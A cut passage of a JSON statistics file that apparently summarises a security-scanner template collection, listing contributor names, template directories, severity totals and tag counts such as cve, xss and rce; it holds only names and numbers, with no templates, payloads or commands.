nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":527},{"name":"panel","count":210},{"name":"xss","count":192},{"name":"wordpress","count":182},{"name":"exposure","count":178},{"name":"rce","count":175},{"name":"cve2020","count":151},{"name":"lfi","count":150},{"name":"wp-plugin","count":121},{"name":"tech","count":92},{"name":"config","count":90},{"name":"cve2019","count":83},{"name":"cve2021","count":83},{"name":"takeover","count":72},{"name":"","count":66},{"name":"cve2018","count":66},{"name":"token","count":64},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"cve2017","count":45},{"name":"iot","count":44},{"name":"file","count":43},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":24},{"name":"listing","count":23},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"cve2015","count":16},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"android","count":13},{"name":"struts","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"cve2012","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"jenkins","count":11},{"name":"springboot","count":11},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"cve2014","count":10},{"name":"devops","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"router","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"coldfusion","count":6},{"name":"backup","count":6},{"name":"dell","count":6},{"name":"jetty","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"files","count":5},{"name":"iis","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"java","count":5},{"name":"fileupload","count":5},{"name":"ruijie","count":5},{"name":"confluence","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"solr","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"django","count":5},{"name":"laravel","count":5},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"solarwinds","count":4},{"name":"traversal","count":4},{"name":"docker","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"magmi","count":4},{"name":"thinkcmf","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"elastic","count":4},{"name":"crlf","count":4},{"name":"vbulletin","count":3},{"name":"itop","count":3},{"name":"fpd","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"microstrategy","count":3},{"name":"windows","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"zabbix","count":3},{"name":"bitrix","count":3},{"name":"resin","count":3},{"name":"printer","count":3},{"name":"hp","count":3},{"name":"cve2010","count":3},{"name":"nacos","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"slack","count":3},{"name":"caucho","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"kafka","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"openssh","count":3},{"name":"lfr","count":3},{"name":"idrac","count":2},{"name":"xxljob","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"service","count":2},{"name":"strapi","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"github","count":2},{"name":"cve2007","count":2},{"name":"yapi","count":2},{"name":"openfire","count":2},{"name":"akamai","count":2},{"name":"paloalto","count":2},{"name":"proxy","count":2},{"name":"spark","count":2},{"name":"kibana","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"keycloak","count":2},{"name":"maian","count":2},{"name":"sonarqube","count":2},{"name":"microsoft","count":2},{"name":"hjtcloud","count":2},{"name":"phpcollab","count":2},{"name":"telerik","count":2},{"name":"jeedom","count":2},{"name":"horde","count":2},{"name":"saltstack","count":2},{"name":"huawei","count":2},{"name":"injection","count":2},{"name":"natshell","count":2},{"name":"showdoc","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"jboss","count":2},{"name":"frp","count":2},{"name":"oauth","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"jellyfin","count":2},{"name":"shellshock","count":2},{"name":"hashicorp","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"pega","count":2},{"name":"intrusive","count":2},{"name":"kevinlab","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"linkerd","count":2},{"name":"plesk","count":2},{"name":"nagios","count":2},{"name":"nextjs","count":2},{"name":"fortios","count":2},{"name":"mida","count":2},{"name":"kentico","count":2},{"name":"chiyu","count":2},{"name":"smb","count":2},{"name":"openam","count":2},{"name":"voipmonitor","count":2},{"name":"prometheus","count":2},{"name":"cve2008","count":2},{"name":"zhiyuan","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"chamilo","count":2},{"name":"seeyon","count":2},{"name":"dos","count":2},{"name":"sonicwall","count":2},{"name":"activemq","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"waf","count":2},{"name":"leak","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"jsf","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"mail","count":2},{"name":"bigip","count":2},{"name":"biometrics","count":1},{"name":"opensns","count":1},{"name":"powercreator","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"plugin","count":1},{"name":"wso2","count":1},{"name":"opentsdb","count":1},{"name":"ricoh","count":1},{"name":"ssltls","count":1},{"name":"wing-ftp","count":1},{"name":"kyan","count":1},{"name":"goahead","count":1},{"name":"seacms","count":1},{"name":"netsweeper","count":1},{"name":"jenzabar","count":1},{"name":"jitsi","count":1},{"name":"swagger","count":1},{"name":"interlib","count":1},{"name":"vnc","count":1},{"name":"doh","count":1},{"name":"robomongo","count":1},{"name":"timeclock","count":1},{"name":"sqlite","count":1},{"name":"addpac","count":1},{"name":"appweb","count":1},{"name":"zend","count":1},{"name":"sarg","count":1},{"name":"zeroshell","count":1},{"name":"fuelcms","count":1},{"name":"netdata","count":1},{"name":"tensorflow","count":1},{"name":"tamronos","count":1},{"name":"parentlink","count":1},{"name":"zcms","count":1},{"name":"embedthis","count":1},{"name":"tensorboard","count":1},{"name":"mongo","count":1},{"name":"ganglia","count":1},{"name":"fortigate","count":1},{"name":"thinkadmin","count":1},{"name":"javascript","count":1},{"name":"gridx","count":1},{"name":"mautic","count":1},{"name":"anchorcms","count":1},{"name":"avtech","count":1},{"name":"ilo4","count":1},{"name":"ntopng","count":1},{"name":"qcubed","count":1},{"name":"servicenow","count":1},{"name":"nedi","count":1},{"name":"wazuh","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"clink-office","count":1},{"name":"rdp","count":1},{"name":"smartsense","count":1},{"name":"centos","count":1},{"name":"weiphp","count":1},{"name":"cocoon","count":1},{"name":"mysql","count":1},{"name":"viewlinc","count":1},{"name":"rfi","count":1},{"name":"vscode","count":1},{"name":"openrestry","count":1},{"name":"varnish","count":1},{"name":"cors","count":1},{"name":"fedora","count":1},{"name":"getsimple","count":1},{"name":"salesforce","count":1},{"name":"nomad","count":1},{"name":"centreon","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"kong","count":1},{"name":"htmli","count":1},{"name":"openx","count":1},{"name":"lutron","count":1},{"name":"ssl","count":1},{"name":"mara","count":1},{"name":"nexusdb","count":1},{"name":"proftpd","count":1},{"name":"dotclear","count":1},{"name":"nps","count":1},{"name":"scimono","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"livezilla","count":1},{"name":"webui","count":1},{"name":"enumeration","count":1},{"name":"turbocrm","count":1},{"name":"realteo","count":1},{"name":"plastic","count":1},{"name":"labtech","count":1},{"name":"h3c-imc","count":1},{"name":"74cms","count":1},{"name":"clave","count":1},{"name":"netrc","count":1},{"name":"triconsole","count":1},{"name":"azure","count":1},{"name":"crm","count":1},{"name":"k8","count":1},{"name":"flink","count":1},{"name":"xdcms","count":1},{"name":"sentry","count":1},{"name":"firebase","count":1},{"name":"tongda","count":1},{"name":"redhat","count":1},{"name":"kubeflow","count":1},{"name":"bullwark","count":1},{"name":"cloudflare","count":1},{"name":"skywalking","count":1},{"name":"twitter-server","count":1},{"name":"feifeicms","count":1},{"name":"mailchimp","count":1},{"name":"solman","count":1},{"name":"zzzcms","count":1},{"name":"erp-nc","count":1},{"name":"jeewms","count":1},{"name":"mirai","count":1},{"name":"phpfusion","count":1},{"name":"pagespeed","count":1},{"name":"octoprint","count":1},{"name":"blue-ocean","count":1},{"name":"rujjie","count":1},{"name":"dom","count":1},{"name":"concrete","count":1},{"name":"redwood","count":1},{"name":"setup","count":1},{"name":"totaljs","count":1},{"name":"phpunit","count":1},{"name":"accela","count":1},{"name":"nuuo","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"cgi","count":1},{"name":"tileserver","count":1},{"name":"discourse","count":1},{"name":"darkstat","count":1},{"name":"monitorr","count":1},{"name":"mediumish","count":1},{"name":"oscommerce","count":1},{"name":"panabit","count":1},{"name":"szhe","count":1},{"name":"xff","count":1},{"name":"memcached","count":1},{"name":"status","count":1},{"name":"clockwatch","count":1},{"name":"mdb","count":1},{"name":"bolt","count":1},{"name":"sourcebans","count":1},{"name":"wiki","count":1},{"name":"aspnuke","count":1},{"name":"wondercms","count":1},{"name":"diris","count":1},{"name":"cacti","count":1},{"name":"upload","count":1},{"name":"xunchi","count":1},{"name":"ambari","count":1},{"name":"expn","count":1},{"name":"wamp","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"mpsec","count":1},{"name":"bigbluebutton","count":1},{"name":"zarafa","count":1},{"name":"spidercontrol","count":1},{"name":"sangfor","count":1},{"name":"svnserve","count":1},{"name":"opensmtpd","count":1},{"name":"tapestry","count":1},{"name":"grails","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"panos","count":1},{"name":"linksys","count":1},{"name":"geutebruck","count":1},{"name":"glances","count":1},{"name":"etouch","count":1},{"name":"maccmsv10","count":1},{"name":"codeigniter","count":1},{"name":"b2evolution","count":1},{"name":"gloo","count":1},{"name":"opencast","count":1},{"name":"mariadb","count":1},{"name":"zte","count":1},{"name":"razor","count":1},{"name":"sco","count":1},{"name":"xmlchart","count":1},{"name":"flash","count":1},{"name":"db","count":1},{"name":"aura","count":1},{"name":"plc","count":1},{"name":"fortinet","count":1},{"name":"ioncube","count":1},{"name":"uwsgi","count":1},{"name":"ns","count":1},{"name":"mcafee","count":1},{"name":"finereport","count":1},{"name":"duomicms","count":1},{"name":"st","count":1},{"name":"wavemaker","count":1},{"name":"rubedo","count":1},{"name":"lighttpd","count":1},{"name":"alerta","count":1},{"name":"cse","count":1},{"name":"hiboss","count":1},{"name":"esmtp","count":1},{"name":"hasura","count":1},{"name":"javamelody","count":1},{"name":"manageengine","count":1},{"name":"floc","count":1},{"name":"landrayoa","count":1},{"name":"ecom","count":1},{"name":"resourcespace","count":1},{"name":"aruba","count":1},{"name":"haproxy","count":1},{"name":"scs","count":1},{"name":"trilithic","count":1},{"name":"jenkin","count":1},{"name":"upnp","count":1},{"name":"favicon","count":1},{"name":"alibaba","count":1},{"name":"calendarix","count":1},{"name":"gitlist","count":1},{"name":"spf","count":1},{"name":"openerp","count":1},{"name":"camunda","count":1},{"name":"bash","count":1},{"name":"webftp","count":1},{"name":"qvisdvr","count":1},{"name":"pulsesecure","count":1},{"name":"netis","count":1},{"name":"lanproxy","count":1},{"name":"cobub","count":1},{"name":"eprints","count":1},{"name":"visionhub","count":1},{"name":"mobileiron","count":1},{"name":"ems","count":1},{"name":"fortigates","count":1},{"name":"acontent","count":1},{"name":"spectracom","count":1},{"name":"glpi","count":1},{"name":"yachtcontrol","count":1},{"name":"metinfo","count":1},{"name":"nuxeo","count":1},{"name":"springframework","count":1},{"name":"synnefo","count":1},{"name":"krweb","count":1},{"name":"dotnetnuke","count":1},{"name":"expose","count":1},{"name":"extractor","count":1},{"name":"stem","count":1},{"name":"tpshop","count":1},{"name":"myucms","count":1},{"name":"wildfly","count":1},{"name":"fastapi","count":1},{"name":"svn","count":1},{"name":"liferay","count":1},{"name":"arl","count":1},{"name":"exacqvision","count":1},{"name":"wmt","count":1},{"name":"rmi","count":1},{"name":"monitorix","count":1},{"name":"postmessage","count":1},{"name":"klog","count":1},{"name":"wooyun","count":1},{"name":"viewpoint","count":1},{"name":"majordomo2","count":1},{"name":"mantis","count":1},{"name":"csrf","count":1},{"name":"magicflow","count":1},{"name":"ec2","count":1},{"name":"cerebro","count":1},{"name":"jnoj","count":1},{"name":"pacsone","count":1},{"name":"comodo","count":1},{"name":"hadoop","count":1},{"name":"spip","count":1},{"name":"dlogin","count":1},{"name":"sprintful","count":1},{"name":"backdoor","count":1},{"name":"jmx","count":1},{"name":"socomec","count":1},{"name":"axis","count":1},{"name":"zookeeper","count":1},{"name":"gespage","count":1},{"name":"xml","count":1},{"name":"webadmin","count":1},{"name":"openstack","count":1},{"name":"xiuno","count":1},{"name":"beanshell","count":1},{"name":"phpinfo","count":1},{"name":"vsftpd","count":1},{"name":"javafaces","count":1},{"name":"opm","count":1},{"name":"rsyncd","count":1},{"name":"heroku","count":1},{"name":"wp-theme","count":1},{"name":"cloudinary","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"shopxo","count":1},{"name":"landray","count":1},{"name":"redcap","count":1},{"name":"dvwa","count":1},{"name":"hortonworks","count":1},{"name":"geddy","count":1},{"name":"avalanche","count":1},{"name":"huijietong","count":1},{"name":"moinmoin","count":1},{"name":"achecker","count":1},{"name":"lancom","count":1},{"name":"apos","count":1},{"name":"pippoint","count":1},{"name":"expressjs","count":1},{"name":"wuzhicms","count":1},{"name":"ueditor","count":1},{"name":"pyramid","count":1},{"name":"jfrog","count":1},{"name":"tenda","count":1},{"name":"dompdf","count":1},{"name":"gogs","count":1},{"name":"npm","count":1},{"name":"nordex","count":1},{"name":"clusterengine","count":1},{"name":"acexy","count":1},{"name":"subrion","count":1},{"name":"pgadmin","count":1},{"name":"bitly","count":1},{"name":"gateone","count":1},{"name":"webmin","count":1},{"name":"email","count":1},{"name":"sceditor","count":1},{"name":"rhymix","count":1},{"name":"acme","count":1},{"name":"portainer","count":1},{"name":"keenetic","count":1},{"name":"2014","count":1},{"name":"selea","count":1},{"name":"grav","count":1},{"name":"exchange","count":1},{"name":"spring","count":1},{"name":"rmc","count":1},{"name":"jquery","count":1},{"name":"kerbynet","count":1},{"name":"bookstack","count":1},{"name":"zimbra","count":1},{"name":"circontrorl","count":1},{"name":"episerver","count":1},{"name":"vsphere","count":1},{"name":"codemeter","count":1},{"name":"bruteforce","count":1},{"name":"rabbitmq","count":1},{"name":"cve2005","count":1},{"name":"ruby","count":1},{"name":"nette","count":1},{"name":"wavlink","count":1},{"name":"druid","count":1},{"name":"kafdrop","count":1},{"name":" default-login","count":1},{"name":"timesheet","count":1},{"name":"chinaunicom","count":1},{"name":"enum","count":1},{"name":"plone","count":1},{"name":"froxlor","count":1},{"name":"domxss","count":1},{"name":"zenario","count":1},{"name":"harbor","count":1},{"name":"saltapi","count":1},{"name":"mantisbt","count":1},{"name":"yii","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"drone","count":1},{"name":"payara","count":1},{"name":"bedita","count":1},{"name":"visualtools","count":1},{"name":"emc","count":1},{"name":"akkadian","count":1},{"name":"servicedesk","count":1},{"name":"woocomernce","count":1},{"name":"adminer","count":1},{"name":"node-red-dashboard","count":1},{"name":"sgp","count":1},{"name":"linkedin","count":1},{"name":"blind","count":1},{"name":"blackboard","count":1},{"name":"fastcgi","count":1},{"name":"symfony","count":1},{"name":"iptime","count":1},{"name":"traefik","count":1},{"name":"circontrol","count":1},{"name":"eyou","count":1},{"name":"sage","count":1},{"name":"csod","count":1},{"name":"commscope","count":1},{"name":"optiLink","count":1},{"name":"sitecore","count":1},{"name":"jsp","count":1},{"name":"primetek","count":1},{"name":"webmodule-ee","count":1},{"name":"k8s","count":1},{"name":"tika","count":1},{"name":"apiman","count":1},{"name":"xvr","count":1},{"name":"nc2","count":1},{"name":"wifisky","count":1},{"name":"faraday","count":1},{"name":"empirecms","count":1},{"name":"zm","count":1},{"name":"fortilogger","count":1},{"name":"fortiweb","count":1},{"name":"checkpoint","count":1},{"name":"fiori","count":1},{"name":"postgres","count":1},{"name":"sidekiq","count":1},{"name":"discord","count":1},{"name":"zmanda","count":1},{"name":"lansweeper","count":1},{"name":"lotuscms","count":1}],"authors":[{"name":"dhiyaneshdk","count":227},{"name":"pikpikcu","count":219},{"name":"pdteam","count":188},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":120},{"name":"daffainfo","count":104},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"jarijaas","count":3},{"name":"mavericknerd","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"manas_harsh","count":2},{"name":"randomrobbie","count":2},{"name":"hetroublemakr","count":2},{"name":"emenalf","count":2},{"name":"zomsop82","count":2},{"name":"incogbyte","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"kiblyn11","count":2},{"name":"afaq","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"nkxxkn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"w4cky_","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"moritz nentwig","count":2},{"name":"0xsapra","count":2},{"name":"bing0o","count":2},{"name":"swissky","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"x1m_martijn","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"alifathi-h1","count":2},{"name":"davidmckennirey","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"0xrudra","count":2},{"name":"0xcrypto","count":2},{"name":"foulenzer","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"bad5ect0r","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"jteles","count":1},{"name":"whynotke","count":1},{"name":"andysvints","count":1},{"name":"shreyapohekar","count":1},{"name":"ooooooo_q","count":1},{"name":"rojanrijal","count":1},{"name":"iampritam","count":1},{"name":"abison_binoy","count":1},{"name":"me9187","count":1},{"name":"andirrahmani1","count":1},{"name":"johnjhacking","count":1},{"name":"luskabol","count":1},{"name":"thevillagehacker","count":1},{"name":"yashanand155","count":1},{"name":"ringo","count":1},{"name":"sicksec","count":1},{"name":"b0yd","count":1},{"name":"kurohost","count":1},{"name":"affix","count":1},{"name":"mohammedsaneem","count":1},{"name":"johnk3r","count":1},{"name":"manuelbua","count":1},{"name":"daviey","count":1},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"j33n1k4","count":1},{"name":"bjhulst","count":1},{"name":"thezakman","count":1},{"name":"absshax","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"toufik airane","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"berkdusunur","count":1},{"name":"mhdsamx","count":1},{"name":"akshansh","count":1},{"name":"sullo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"flag007","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"co0nan","count":1},{"name":"nytr0gen","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"cookiehanhoan","count":1},{"name":"its0x08","count":1},{"name":"knassar702","count":1},{"name":"_darrenmartyn","count":1},{"name":"petruknisme","count":1},{"name":"bernardofsr","count":1},{"name":"bolli95","count":1},{"name":"ohlinge","count":1},{"name":"0xtavian","count":1},{"name":"pdp","count":1},{"name":"huowuzhao","count":1},{"name":"smaranchand","count":1},{"name":"hakluke","count":1},{"name":"aresx","count":1},{"name":"ipanda","count":1},{"name":"th3.d1p4k","count":1},{"name":"regala_","count":1},{"name":"alex","count":1},{"name":"shifacyclewla","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ajaysenr","count":1},{"name":"tim_koopmans","count":1},{"name":"sy3omda","count":1},{"name":"idealphase","count":1},{"name":"d0rkerdevil","count":1},{"name":"dogasantos","count":1},{"name":"willd96","count":1},{"name":"notsoevilweasel","count":1},{"name":"alph4byt3","count":1},{"name":"elmahdi","count":1},{"name":"vsh00t","count":1},{"name":"juicypotato1","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"vzamanillo","count":1},{"name":"aceseven 